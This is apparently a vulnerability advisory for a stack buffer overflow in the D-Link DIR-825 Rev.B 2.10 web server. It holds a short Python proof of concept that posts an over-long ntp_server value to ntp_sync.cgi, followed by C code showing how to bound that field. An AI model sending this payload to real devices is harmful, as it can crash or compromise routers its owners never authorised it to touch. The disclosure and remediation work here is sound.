Description
There is a stack-based buffer overflow vulnerability that can be used to execute arbitrary code after user authentication.
Vulnerability location: file: /sbin/httpd
The attacker reaches the vulnerable function by sending a POST request to http://ip/ntp_sync.cgi; the overflow is triggered by an over-long value in the ntp_server form field.
Firmware version
version: Rev.B 2.10
download link: ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-825/REVB/
POST packet (ntp-server-overflow.py)
import requests

ip = "http://192.168.0.1/"
url = ip + 'ntp_sync.cgi'

# 0x50 bytes of 'A' is enough to overrun the fixed-size stack buffer
command = 'A' * 0x50

payload = {
    'ntp_server': command,
}

# The request must carry a valid authenticated session for the handler to be reached
r = requests.post(url, data=payload)
Exploit (run the script)
python3 ntp-server-overflow.py
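The root cause described above is an unbounded copy of the ntp_server field into a fixed-size stack buffer. The following C code is an added example of how a CGI handler should bound that field before storing it; it is not the firmware's own code and the limits it enforces (DNS name length limits from RFC 1035, a hypothetical 64-byte destination) are assumptions chosen for illustration. The length check runs before any byte is written, so a request like the one in the PoC is rejected instead of overrunning the buffer.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed bounds for the ntp_server parameter: a DNS name is at most
 * 253 characters and each label at most 63 (RFC 1035 limits). */
#define NTP_SERVER_MAX 253
#define DNS_LABEL_MAX  63

/* Return 1 if `in` is a syntactically valid host name within the bounds
 * above, 0 otherwise. Nothing is copied here; this only inspects input.
 * The scan stops at NTP_SERVER_MAX + 1 bytes so an unterminated or huge
 * value is rejected without walking past the limit. */
int ntp_server_is_valid(const char *in)
{
    size_t len = 0, label = 0;
    if (in == NULL) return 0;
    while (len <= NTP_SERVER_MAX && in[len] != '\0') len++;
    if (len == 0 || len > NTP_SERVER_MAX) return 0;
    for (size_t i = 0; i < len; i++) {
        char c = in[i];
        if (c == '.') {
            if (label == 0) return 0;        /* empty label: leading dot or ".." */
            label = 0;
            continue;
        }
        if (!(isalnum((unsigned char)c) || c == '-')) return 0;
        if (++label > DNS_LABEL_MAX) return 0; /* a run of 0x50 'A's fails here */
    }
    return label > 0;                          /* reject a trailing dot */
}

/* Copy a validated value into the handler's fixed-size destination.
 * Returns 0 on success, -1 if the value is invalid or would not fit
 * (including the terminating NUL). The destination is never written
 * unless the whole value fits, so the client cannot overrun it. */
int ntp_server_store(const char *in, char *dst, size_t dstlen)
{
    if (dst == NULL || dstlen == 0) return -1;
    if (!ntp_server_is_valid(in)) return -1;
    size_t len = strlen(in);
    if (len >= dstlen) return -1;
    memcpy(dst, in, len);
    dst[len] = '\0';
    return 0;
}

int main(void)
{
    char buf[64];                 /* hypothetical handler buffer size */
    char oversized[0x50 + 1];     /* constructed input matching the PoC */
    memset(oversized, 'A', 0x50);
    oversized[0x50] = '\0';
    printf("pool.ntp.org -> %d\n", ntp_server_store("pool.ntp.org", buf, sizeof buf));
    printf("0x50 x 'A'   -> %d\n", ntp_server_store(oversized, buf, sizeof buf));
    return 0;
}
```

The validator and the copy are deliberately separate: the validator can be reused wherever the field is parsed, and the copy takes the destination size as a parameter so the bound lives next to the write rather than in a distant constant.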
